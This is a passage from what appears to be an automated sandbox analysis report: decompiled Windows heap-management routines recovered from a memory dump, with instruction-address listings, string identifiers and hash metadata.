						} else {
							_t293 = E00B54167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t293;
							if(_t293 < 0) {
								L89:
								_t472 = 3;
								E00B5444F(_t493, _t472);
								__eflags = _v12;
								if(_v12 != 0) {
									E00B5A96B(_t493, _t421, _v28 + 0xffffffe8, _v16, _a4,  &_a12);
								}
								L54:
								_push(_a12);
								_push(_a4);
								L12:
								_push(_t493);
								_t279 = E00B57353();
								L7:
								return _t279;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t300 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t300 + 0x240) & 0x00000001;
								if(( *(_t300 + 0x240) & 0x00000001) != 0) {
									E00BEEFE0(_t493, _v8, _a8, 5);
								}
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t301 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t301 - 0x7f000;
							if(_t301 >= 0x7f000) {
								_t139 = _t493 + 0xe4;
								 *_t139 =  *(_t493 + 0xe4) - _t301;
								__eflags =  *_t139;
							}
							E00B5AB77(_t493, _t484);
							 *((intOrPtr*)(_t484 + 0x14)) =  *((intOrPtr*)(_t484 + 0x14)) + _a8;
							E00B5AA2C(_t493, _t484);
							 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) + (_a8 >> 0xc);
							_t307 = _a8;
							 *(_t493 + 0xe0) =  *(_t493 + 0xe0) - _t307;
							_t486 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t486 - 0x7f000;
							if(_t486 >= 0x7f000) {
								_t151 = _t493 + 0xe4;
								 *_t151 =  *(_t493 + 0xe4) + _t486;
								__eflags =  *_t151;
							}
							__eflags = _v12;
							if(_v12 != 0) {
								L73:
								_t308 =  *0x7ffe0380;
								__eflags = _t308;
								if(_t308 != 0) {
									__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E00BEF48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, _v12, _v16, _t308 & 0x000000ff);
									}
								}
								_t279 =  *0x7ffe038a;
								__eflags = _t279;
								if(__eflags != 0) {
									_push(_t279 & 0x000000ff);
									_push(_v16);
									_push(_v12);
									L118:
									_push( *(_t493 + 0x78) << 3);
									_push(_a8);
									_push(_v8);
									_push(_t493);
									_t279 = E00BEF48C(__eflags);
								}
								goto L7;
							} else {
								_t487 = _t307 + _v8;
								_t442 = _a4;
								_t487[2] =  *(_t493 + 0x54);
								_t317 = _a12;
								_t476 = _a8 + _v8;
								__eflags = _t442 + _t317 * 8 - _a8 + _v8;
								if(_t442 + _t317 * 8 == _a8 + _v8) {
									__eflags =  *(_t493 + 0x4c);
									if( *(_t493 + 0x4c) != 0) {
										_t487[1] = _t487[1] ^ _t487[0] ^  *_t487;
										 *_t487 =  *_t487 ^  *(_t493 + 0x50);
									}
									goto L73;
								}
								_t487[3] = 0;
								_t487[1] = 0;
								_t326 = (_a12 << 3) - _a8 >> 3;
								 *_t487 = _t326;
								__eflags =  *0xc277b0 - 1;
								if( *0xc277b0 >= 1) {
									__eflags = _t326 - 1;
									if(_t326 <= 1) {
										_t335 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t335 + 0xc);
										if( *(_t335 + 0xc) == 0) {
											_push("HEAP: ");
											E00B9373B();
										} else {
											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("((LONG)FreeEntry->Size > 1)");
										E00B9373B();
										E00BEF826(_t421, _t476, _t487, _t493, 1);
									}
								}
								_t487[1] = 0;
								_t444 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t444 - _t421;
								if(_t444 == _t421) {
									_t327 = 0;
								} else {
									_t327 = (_t487 - _t421 >> 0x10) + 1;
									_a16 = _t327;
									__eflags = _t327;
									if(__eflags <= 0) {
										L99:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t487);
										_push(_t444);
										_push(3);
										E00BEF840(_t421, _t444, _t476, _t487, _t493, __eflags);
										_t327 = _a16;
										L72:
										_t487[3] = _t327;
										E00B57353(_t493, _t487,  *_t487 & 0x0000ffff);
										goto L73;
									}
									__eflags = _t327 - 0xfe;
									if(__eflags >= 0) {
										goto L99;
									}
								}
								goto L72;
							}
						}
					}
					L18:
					_t357 = _a4;
					_t38 = _t357 + 0x101f; // 0x101f
					_t484 = 0xfffff000;
					_t452 = _t38 & 0xfffff000;
					_t39 = _t357 + 0x28; // 0x28
					_v8 = _t452;
					__eflags = _t452 - _t39;
					if(_t452 == _t39) {
						_t452 = _t452 + 0x1000;
						_v8 = _t452;
					}
					__eflags = _v12;
					_t471 = _a12;
					if(_v12 != 0) {
						_t358 = _t357 + _t471 * 8;
					} else {
						_t358 = _t357 + _t471 * 8 - 0x10;
					}
					_t359 = _t358 & _t484;
					_a8 = _t359;
					__eflags = _t359 - _t452;
					if(_t359 < _t452) {
						goto L85;
					} else {
						_t360 = _t359 - _t452;
						__eflags = _a16;
						_a8 = _t360;
						if(_a16 != 0) {
							L26:
							__eflags = _t360;
							if(__eflags == 0) {
								L30:
								__eflags = _v12;
								if(_v12 != 0) {
									L38:
									E00B5A96B(_t493, _t421, _t452 + 0xffffffe8, _t360, _a4,  &_v32);
									E00B57353(_t493, _a4, _v32);
									_t363 =  *0x7ffe0380;
									__eflags = _t363;
									if(_t363 != 0) {
										__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
										if(__eflags != 0) {
											E00BEF48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, 0, 0, _t363 & 0x000000ff);
										}
									}
									_t279 =  *0x7ffe038a;
									__eflags = _t279;
									if(__eflags == 0) {
										goto L7;
									} else {
										_push(_t279 & 0x000000ff);
										_push(0);
										_push(0);
										goto L118;
									}
								}
								_t488 = _t360 + _t452;
								_t456 = _a4;
								_t488[2] =  *(_t493 + 0x54);
								_t370 = _a12;
								_t479 = _t456 + _t370 * 8;
								_t360 = _a8;
								_t452 = _v8;
								_t423 = _t360 + _t452;
								__eflags = _t456 + _t370 * 8 - _t360 + _t452;
								if(_t456 + _t370 * 8 == _t360 + _t452) {
									__eflags =  *(_t493 + 0x4c);
									_t421 = _v20;
									if( *(_t493 + 0x4c) != 0) {
										_t488[1] = _t488[1] ^ _t488[0] ^  *_t488;
										 *_t488 =  *_t488 ^  *(_t493 + 0x50);
										L37:
										_t360 = _a8;
										_t452 = _v8;
										goto L38;
									}
									goto L38;
								}
								_t488[3] = 0;
								_t488[1] = 0;
								_t380 = (_a12 << 3) - _a8 - _v8 + _a4 >> 3;
								 *_t488 = _t380;
								__eflags =  *0xc277b0 - 1;
								if( *0xc277b0 >= 1) {
									__eflags = _t380 - 1;
									if(_t380 <= 1) {
										_t389 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t389 + 0xc);
										if( *(_t389 + 0xc) == 0) {
											_push("HEAP: ");
											E00B9373B();
										} else {
											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("(LONG)FreeEntry->Size > 1");
										E00B9373B();
										E00BEF826(_t423, _t479, _t488, _t493, 1);
									}
								}
								_t421 = _v20;
								_t488[1] = 0;
								_t457 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t457 - _t421;
								if(_t457 == _t421) {
									_t381 = 0;
								} else {
									_t381 = (_t488 - _t421 >> 0x10) + 1;
									_a16 = _t381;
									__eflags = _t381;
									if(__eflags <= 0) {
										L113:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t488);
										_push(_t457);
										_push(3);
										E00BEF840(_t421, _t457, _t479, _t488, _t493, __eflags);
										_t381 = _a16;
										L36:
										_t488[3] = _t381;
										E00B57353(_t493, _t488,  *_t488 & 0x0000ffff);
										goto L37;
									}
									__eflags = _t381 - 0xfe;
									if(__eflags >= 0) {
										goto L113;
									}
								}
								goto L36;
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t401 = E00B54167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t401;
							if(_t401 < 0) {
								goto L89;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t403 + 0x240) & 0x00000001;
								if(( *(_t403 + 0x240) & 0x00000001) != 0) {
									E00BEEFE0(_t493, _v8, _a8, 6);
								}
							}
							_t360 = _a8;
							_t452 = _v8;
							goto L30;
						}
						_t471 = _v24;
						__eflags =  *((char*)(_t471 + 7)) - 3;
						if( *((char*)(_t471 + 7)) == 3) {
							goto L26;
						}
						__eflags = _t360;
						if(_t360 == 0) {
							goto L54;
						}
						__eflags = _t360 -  *((intOrPtr*)(_t493 + 0x70));
						if(_t360 <  *((intOrPtr*)(_t493 + 0x70))) {
							goto L54;
						}
						goto L26;
					}
				}
				_t480 = _a12;
				if(_t480 <  *((intOrPtr*)(_t493 + 0x70))) {
					L11:
					_push(_t480);
					_push(_a8);
					goto L12;
				}
				_t410 =  *(_t493 + 0x78) + _t480;
				if(_t410 <  *((intOrPtr*)(_t493 + 0x74)) || _t410 <  *(_t493 + 0xe0) >>  *((intOrPtr*)(_t493 + 0x130)) + 3) {
					goto L11;
				} else {
					_t420 = _a8;
					_a4 = E00B529B2(_t493, _t420,  &_a12, 0);
					_t413 = _a12;
					if(_a12 - 0x201 > 0xfbff) {
						goto L13;
					} else {
						E00B57353(_t493, _a4, _t413);
						_t492 =  *(_t493 + 0xe0) - ( *(_t493 + 0x78) << 3);
						_t279 =  *(_t493 + 0x128) - ( *(_t493 + 0x128) >> 3);
						if(_t492 < _t279) {
							_t426 = _t493 + 0x12c;
							_t279 =  *_t426 - ( *_t426 >> 3);
							__eflags = _t492 - _t279;
							if(_t492 > _t279) {
								_t279 = E00B76372(_t493);
								 *_t426 = _t492;
								 *(_t493 + 0x128) = _t492;
							}
						}
						goto L7;
					}
				}
			}































































                                                        0x00b6ee55
                                                        0x00b6ee61
                                                        0x00b6ee65
                                                        0x00000000
                                                        0x00ba9a54
                                                        0x00b6ee71
                                                        0x00b946f2
                                                        0x00b946f5
                                                        0x00b946f9
                                                        0x00ba9a5e
                                                        0x00ba9a70
                                                        0x00ba9a75
                                                        0x00ba9a77
                                                        0x00ba9a80
                                                        0x00ba9a80
                                                        0x00ba9a77
                                                        0x00b946ff
                                                        0x00b89b97
                                                        0x00b89b97
                                                        0x00b89b9a
                                                        0x00b89b9c
                                                        0x00b98909
                                                        0x00b9890b
                                                        0x00b89ba2
                                                        0x00b89bb0
                                                        0x00b89bb0
                                                        0x00b89bb6
                                                        0x00b89bb6
                                                        0x00b89bbf
                                                        0x00b89bc2
                                                        0x00b89bc6
                                                        0x00b89bc9
                                                        0x00b89de5
                                                        0x00b89dec
                                                        0x00b89df4
                                                        0x00b89dfa
                                                        0x00b89dfd
                                                        0x00b89e06
                                                        0x00b89e0c
                                                        0x00b89e12
                                                        0x00b89e18
                                                        0x00b89e1f
                                                        0x00b89e24
                                                        0x00b89e24
                                                        0x00b89e24
                                                        0x00b89e24
                                                        0x00b89e37
                                                        0x00b89e3a
                                                        0x00b89bcf
                                                        0x00b89bcf
                                                        0x00b89bcf
                                                        0x00b89bcf
                                                        0x00b89bcf
                                                        0x00b89bd3
                                                        0x00b89bda
                                                        0x00b89bde
                                                        0x00b98a98
                                                        0x00b98a9d
                                                        0x00b98aa0
                                                        0x00b98aa5
                                                        0x00b98aa9
                                                        0x00b98aab
                                                        0x00b98913
                                                        0x00b98915
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9891b
                                                        0x00b98ab1
                                                        0x00b98ab1
                                                        0x00b98ab8
                                                        0x00ba9a8b
                                                        0x00ba9a8d
                                                        0x00ba9a99
                                                        0x00ba9a9c
                                                        0x00ba9a9f
                                                        0x00ba9ac1
                                                        0x00ba9ac6
                                                        0x00ba9aa1
                                                        0x00ba9ab9
                                                        0x00ba9abe
                                                        0x00ba9acc
                                                        0x00ba9ad1
                                                        0x00ba9ad9
                                                        0x00ba9ad9
                                                        0x00ba9a8d
                                                        0x00b98abe
                                                        0x00b98ac2
                                                        0x00b98ac5
                                                        0x00b98ac8
                                                        0x00b98c32
                                                        0x00b98ace
                                                        0x00b98ace
                                                        0x00b98ace
                                                        0x00b98ace
                                                        0x00b98ad7
                                                        0x00b98ad7
                                                        0x00b98ada
                                                        0x00b98add
                                                        0x00ba9ae3
                                                        0x00ba9ae3
                                                        0x00ba9aea
                                                        0x00ba9af0
                                                        0x00ba9af4
                                                        0x00ba9b00
                                                        0x00ba9b03
                                                        0x00ba9b07
                                                        0x00ba9d7a
                                                        0x00ba9d7f
                                                        0x00ba9b0d
                                                        0x00ba9b25
                                                        0x00ba9b2a
                                                        0x00ba9d85
                                                        0x00ba9d8a
                                                        0x00ba9d92
                                                        0x00ba9d92
                                                        0x00ba9af4
                                                        0x00000000
                                                        0x00b98ae3
                                                        0x00b98af2
                                                        0x00b98af7
                                                        0x00b98af9
                                                        0x00ba9b30
                                                        0x00ba9b32
                                                        0x00ba9b35
                                                        0x00ba9b3a
                                                        0x00ba9b3e
                                                        0x00ba9b57
                                                        0x00ba9b57
                                                        0x00b98941
                                                        0x00b98941
                                                        0x00b98944
                                                        0x00b842da
                                                        0x00b842da
                                                        0x00b842db
                                                        0x00b6eefb
                                                        0x00000000
                                                        0x00b6eefc
                                                        0x00b98aff
                                                        0x00b98b06
                                                        0x00ba9b67
                                                        0x00ba9b6a
                                                        0x00ba9b71
                                                        0x00ba9b80
                                                        0x00ba9b80
                                                        0x00ba9b71
                                                        0x00b98b0c
                                                        0x00b98b12
                                                        0x00b98b15
                                                        0x00b98b1a
                                                        0x00b98b1c
                                                        0x00b98b1c
                                                        0x00b98b1c
                                                        0x00b98b1c
                                                        0x00b98b26
                                                        0x00b98b2e
                                                        0x00b98b35
                                                        0x00b98b40
                                                        0x00b98b43
                                                        0x00b98b46
                                                        0x00b98b4c
                                                        0x00b98b4f
                                                        0x00b98b55
                                                        0x00b98b57
                                                        0x00b98b57
                                                        0x00b98b57
                                                        0x00b98b57
                                                        0x00b98b5d
                                                        0x00b98b61
                                                        0x00b98bed
                                                        0x00b98bed
                                                        0x00b98bf2
                                                        0x00b98bf4
                                                        0x00ba9c21
                                                        0x00ba9c28
                                                        0x00ba9c46
                                                        0x00ba9c46
                                                        0x00ba9c28
                                                        0x00b98bfa
                                                        0x00b98bff
                                                        0x00b98c01
                                                        0x00ba9c53
                                                        0x00ba9c54
                                                        0x00ba9c57
                                                        0x00ba9d62
                                                        0x00ba9d68
                                                        0x00ba9d69
                                                        0x00ba9d6c
                                                        0x00ba9d6f
                                                        0x00ba9d70
                                                        0x00ba9d70
                                                        0x00000000
                                                        0x00b98b67
                                                        0x00b98b6a
                                                        0x00b98b71
                                                        0x00b98b74
                                                        0x00b98b78
                                                        0x00b98b84
                                                        0x00b98b86
                                                        0x00b98b88
                                                        0x00b98920
                                                        0x00b98924
                                                        0x00ba9c0a
                                                        0x00ba9c10
                                                        0x00ba9c10
                                                        0x00000000
                                                        0x00b98924
                                                        0x00b98b8e
                                                        0x00b98b92
                                                        0x00b98b9f
                                                        0x00b98ba2
                                                        0x00b98ba5
                                                        0x00b98bac
                                                        0x00ba9b8a
                                                        0x00ba9b8e
                                                        0x00ba9b9a
                                                        0x00ba9b9d
                                                        0x00ba9ba1
                                                        0x00ba9bc3
                                                        0x00ba9bc8
                                                        0x00ba9ba3
                                                        0x00ba9bbb
                                                        0x00ba9bc0
                                                        0x00ba9bce
                                                        0x00ba9bd3
                                                        0x00ba9bdb
                                                        0x00ba9bdb
                                                        0x00ba9b8e
                                                        0x00b98bb2
                                                        0x00b98bb6
                                                        0x00b98bb9
                                                        0x00b98bbb
                                                        0x00ba9be5
                                                        0x00b98bc1
                                                        0x00b98bc8
                                                        0x00b98bc9
                                                        0x00b98bcc
                                                        0x00b98bce
                                                        0x00ba9bec
                                                        0x00ba9bec
                                                        0x00ba9bee
                                                        0x00ba9bf0
                                                        0x00ba9bf1
                                                        0x00ba9bf2
                                                        0x00ba9bf3
                                                        0x00ba9bf5
                                                        0x00ba9bfa
                                                        0x00b98bdf
                                                        0x00b98bdf
                                                        0x00b98be8
                                                        0x00000000
                                                        0x00b98be8
                                                        0x00b98bd4
                                                        0x00b98bd9
                                                        0x00000000
                                                        0x00000000
                                                        0x00b98bd9
                                                        0x00000000
                                                        0x00b98bbb
                                                        0x00b98b61
                                                        0x00b98add
                                                        0x00b89be4
                                                        0x00b89be4
                                                        0x00b89be7
                                                        0x00b89bed
                                                        0x00b89bf2
                                                        0x00b89bf4
                                                        0x00b89bf7
                                                        0x00b89bfa
                                                        0x00b89bfc
                                                        0x00ba9c5f
                                                        0x00ba9c65
                                                        0x00ba9c65
                                                        0x00b89c02
                                                        0x00b89c06
                                                        0x00b89c09
                                                        0x00b89e43
                                                        0x00b89c0f
                                                        0x00b89c0f
                                                        0x00b89c0f
                                                        0x00b89c13
                                                        0x00b89c15
                                                        0x00b89c18
                                                        0x00b89c1a
                                                        0x00000000
                                                        0x00b89c20
                                                        0x00b89c20
                                                        0x00b89c22
                                                        0x00b89c26
                                                        0x00b89c29
                                                        0x00b89c45
                                                        0x00b89c45
                                                        0x00b89c47
                                                        0x00b89c7e
                                                        0x00b89c7e
                                                        0x00b89c82
                                                        0x00b89d1b
                                                        0x00b89d29
                                                        0x00b89d35
                                                        0x00b89d3a
                                                        0x00b89d3f
                                                        0x00b89d41
                                                        0x00ba9d2d
                                                        0x00ba9d34
                                                        0x00ba9d50
                                                        0x00ba9d50
                                                        0x00ba9d34
                                                        0x00b89d47
                                                        0x00b89d4c
                                                        0x00b89d4e
                                                        0x00000000
                                                        0x00b89d54
                                                        0x00ba9d5d
                                                        0x00ba9d5e
                                                        0x00ba9d60
                                                        0x00000000
                                                        0x00ba9d60
                                                        0x00b89d4e
                                                        0x00b89c88
                                                        0x00b89c8f
                                                        0x00b89c92
                                                        0x00b89c96
                                                        0x00b89c99
                                                        0x00b89c9c
                                                        0x00b89c9f
                                                        0x00b89ca2
                                                        0x00b89ca5
                                                        0x00b89ca7
                                                        0x00b9892f
                                                        0x00b98933
                                                        0x00b98936
                                                        0x00ba9d16
                                                        0x00ba9d1c
                                                        0x00b89d15
                                                        0x00b89d15
                                                        0x00b89d18
                                                        0x00000000
                                                        0x00b89d18
                                                        0x00000000
                                                        0x00b9893c
                                                        0x00b89cad
                                                        0x00b89cb1
                                                        0x00b89cc4
                                                        0x00b89cc7
                                                        0x00b89cca
                                                        0x00b89cd1
                                                        0x00ba9c96
                                                        0x00ba9c9a
                                                        0x00ba9ca6
                                                        0x00ba9ca9
                                                        0x00ba9cad
                                                        0x00ba9ccf
                                                        0x00ba9cd4
                                                        0x00ba9caf
                                                        0x00ba9cc7
                                                        0x00ba9ccc
                                                        0x00ba9cda
                                                        0x00ba9cdf
                                                        0x00ba9ce7
                                                        0x00ba9ce7
                                                        0x00ba9c9a
                                                        0x00b89cd7
                                                        0x00b89cda
                                                        0x00b89cde
                                                        0x00b89ce1
                                                        0x00b89ce3
                                                        0x00ba9cf1
                                                        0x00b89ce9
                                                        0x00b89cf0
                                                        0x00b89cf1
                                                        0x00b89cf4
                                                        0x00b89cf6
                                                        0x00ba9cf8
                                                        0x00ba9cf8
                                                        0x00ba9cfa
                                                        0x00ba9cfc
                                                        0x00ba9cfd
                                                        0x00ba9cfe
                                                        0x00ba9cff
                                                        0x00ba9d01
                                                        0x00ba9d06
                                                        0x00b89d07
                                                        0x00b89d07
                                                        0x00b89d10
                                                        0x00000000
                                                        0x00b89d10
                                                        0x00b89cfc
                                                        0x00b89d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d01
                                                        0x00000000
                                                        0x00b89ce3
                                                        0x00b89c49
                                                        0x00b89c5e
                                                        0x00b89c63
                                                        0x00b89c65
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89c6b
                                                        0x00b89c72
                                                        0x00ba9c73
                                                        0x00ba9c76
                                                        0x00ba9c7d
                                                        0x00ba9c8c
                                                        0x00ba9c8c
                                                        0x00ba9c7d
                                                        0x00b89c78
                                                        0x00b89c7b
                                                        0x00000000
                                                        0x00b89c7b
                                                        0x00b89c2b
                                                        0x00b89c2e
                                                        0x00b89c32
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89c34
                                                        0x00b89c36
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89c3c
                                                        0x00b89c3f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89c3f
                                                        0x00b89c1a
                                                        0x00b6ee77
                                                        0x00b6ee7d
                                                        0x00b842d6
                                                        0x00b842d6
                                                        0x00b842d7
                                                        0x00000000
                                                        0x00b842d7
                                                        0x00b6ee86
                                                        0x00b6ee8b
                                                        0x00000000
                                                        0x00b6eeaa
                                                        0x00b6eeaa
                                                        0x00b6eeba
                                                        0x00b6eebd
                                                        0x00b6eecc
                                                        0x00000000
                                                        0x00b6eed2
                                                        0x00b6eed7
                                                        0x00b6eee8
                                                        0x00b6eef5
                                                        0x00b6eef9
                                                        0x00b6ef02
                                                        0x00b6ef0f
                                                        0x00b6ef11
                                                        0x00b6ef13
                                                        0x00b6ef17
                                                        0x00b6ef1c
                                                        0x00b6ef1e
                                                        0x00b6ef1e
                                                        0x00b6ef13
                                                        0x00000000
                                                        0x00b6eef9
                                                        0x00b6eecc

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-523794902
                                                        • Opcode ID: 93cab4f53681a143c19e6d5e01fd118cdf8e35cf787bb5b8b10b4ccf762966c5
                                                        • Instruction ID: 8a37e41296aeb28885c8e453abc0029e0cac8898635f1df82a7778b798780e6c
                                                        • Opcode Fuzzy Hash: 93cab4f53681a143c19e6d5e01fd118cdf8e35cf787bb5b8b10b4ccf762966c5
                                                        • Instruction Fuzzy Hash: 5C32DC71604689AFDF11DF68C880FAAB7E5FF05310F1480E9F8558B292DB34EA85DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B57353, Relevance: 5.5, Strings: 4, Instructions: 466COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 62%
                                                        			E00B57353(signed int _a4, signed int _a8, void* _a11, signed int _a12) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed short _t197;
				signed int _t200;
				signed int _t201;
				signed int _t205;
				signed short _t206;
				signed short _t210;
				signed short _t211;
				intOrPtr _t218;
				signed short _t220;
				signed int _t221;
				signed short _t223;
				signed short* _t225;
				signed short _t226;
				signed short* _t229;
				signed short _t230;
				signed short _t237;
				signed int _t239;
				signed short _t240;
				signed short _t248;
				signed short _t249;
				signed short _t257;
				signed int _t266;
				signed short _t268;
				signed int _t269;
				signed int _t270;
				signed short* _t276;
				signed short* _t277;
				signed int _t282;
				intOrPtr _t284;
				signed int* _t286;
				signed short _t291;
				signed short _t294;
				signed short _t297;
				signed short _t298;
				signed int _t299;
				signed short _t304;
				signed int _t305;
				signed short _t307;
				signed short _t310;
				signed short _t311;
				intOrPtr _t318;
				intOrPtr _t319;
				signed short _t320;
				signed short _t321;
				signed int _t323;
				void* _t327;
				signed short _t329;
				signed int _t330;
				intOrPtr _t333;
				signed int _t335;
				signed int _t336;
				signed short _t340;
				signed short _t341;
				signed short _t342;
				signed short _t343;
				signed int _t344;
				signed int _t348;
				signed int _t350;
				intOrPtr _t353;
				signed short* _t354;

				if(_a12 == 0) {
					return _t197;
				} else {
					_push(__ebx);
					_push(__esi);
					__esi = _a8;
					_push(__edi);
					__edi = _a4;
					__ebx = ( *(__esi + 4) ^  *(__edi + 0x54)) & 0x0000ffff;
					__eflags = __bx;
					if(__bx == 0) {
						__eflags =  *0xc277b0 - 1;
						if( *0xc277b0 >= 1) {
							__eflags =  *(__esi + 2) & 0x00000008;
							if(( *(__esi + 2) & 0x00000008) == 0) {
								__esi + 0xfff = __esi + 0x00000fff & 0xfffff000;
								__eflags = (__esi + 0x00000fff & 0xfffff000) - __esi;
								if((__esi + 0x00000fff & 0xfffff000) != __esi) {
									__eax =  *[fs:0x18];
									__eax =  *( *[fs:0x18] + 0x30);
									__eflags =  *(__eax + 0xc);
									if( *(__eax + 0xc) == 0) {
										_push("HEAP: ");
										__eax = E00B9373B();
									} else {
										 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
										 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
										 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
										_pop(__ecx);
									}
									_pop(__ecx);
									_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
									__eax = E00B9373B();
									_pop(__ecx);
									__eax = E00BEF826(__ebx, __edx, __edi, __esi, 1);
								}
							}
						}
					}
					__al =  *((intOrPtr*)(__esi + 6));
					__eflags = __al;
					if(__al == 0) {
						_v28 = __edi;
					} else {
						__ecx = __al & 0x000000ff;
						__eax = __esi;
						__ecx = (__al & 0x000000ff) << 0x10;
						__esi & 0xffff0000 = (__esi & 0xffff0000) - __ecx;
						__eax = (__esi & 0xffff0000) - __ecx + 0x10000;
						__eflags = __eax;
						_v28 = __eax;
					}
					__al =  *(__esi + 2);
					_a11 =  *(__esi + 2);
					do {
						__eflags = _a12 - 0xfe00;
						if(_a12 > 0xfe00) {
							__eflags = _a12 - 0xfe01;
							_v8 = 0xfe00;
							if(_a12 == 0xfe01) {
								_v8 = 0xfdf0;
							}
							_t354[1] = 0;
						} else {
							_v8 = _a12 & 0x0000ffff;
							_t354[1] = _a11;
						}
						_t333 = _a4;
						_t354[2] =  *(_t333 + 0x54) ^ _t266;
						_t205 = _v28;
						_t284 =  *((intOrPtr*)(_t205 + 0x18));
						__eflags = _t284 - _t205;
						if(_t284 == _t205) {
							_t268 = 0;
						} else {
							_t268 = (_t354 - _t205 >> 0x10) + 1;
							__eflags = _t268;
							if(__eflags <= 0) {
								L113:
								_push(0);
								_push(0);
								_push(_t205);
								_push(_t354);
								_push(_t284);
								_push(3);
								E00BEF840(_t268, _t284, _t318, _t333, _t354, __eflags);
								L11:
								_t206 = _v8;
								_t354[1] = _t354[1] & 0x000000f0;
								_t354[3] = _t268;
								 *_t354 = _t206;
								_t354[1] = 0;
								_t354[3] = 0;
								__eflags =  *(_t333 + 0x40) & 0x00000040;
								_t269 = _t206 & 0x0000ffff;
								if(( *(_t333 + 0x40) & 0x00000040) != 0) {
									E00B789F0( &(_t354[8]), _t269 * 8 - 0x10, 0xfeeefeee);
									_t354[1] = _t354[1] | 0x00000004;
								}
								_t210 =  *(_t333 + 0xb8);
								__eflags = _t210;
								if(_t210 == 0) {
									_t211 =  *(_t333 + 0xc4);
									goto L41;
								} else {
									while(1) {
										__eflags = _t269 -  *((intOrPtr*)(_t210 + 4));
										if(_t269 <  *((intOrPtr*)(_t210 + 4))) {
											break;
										}
										_t311 =  *_t210;
										__eflags = _t311;
										if(_t311 != 0) {
											_t210 = _t311;
											continue;
										} else {
											_t298 =  *((intOrPtr*)(_t210 + 4)) - 1;
											__eflags = _t298;
											_v24 = _t298;
											L16:
											_t276 = _t210 + 0x14;
											while(1) {
												_t320 =  *(_t210 + 0x18);
												_t299 = _t298 -  *_t276;
												_v12 = _t210;
												_t218 =  *((intOrPtr*)(_t320 + 4));
												_v20 = _t320;
												__eflags = _t320 - _t218;
												if(_t320 == _t218) {
													goto L79;
												}
												L18:
												_t321 =  *(_t333 + 0x4c);
												_v32 = _t321;
												__eflags = _t321;
												if(_t321 == 0) {
													_t220 =  *(_t218 - 8) & 0x0000ffff;
												} else {
													_t249 =  *(_t218 - 8);
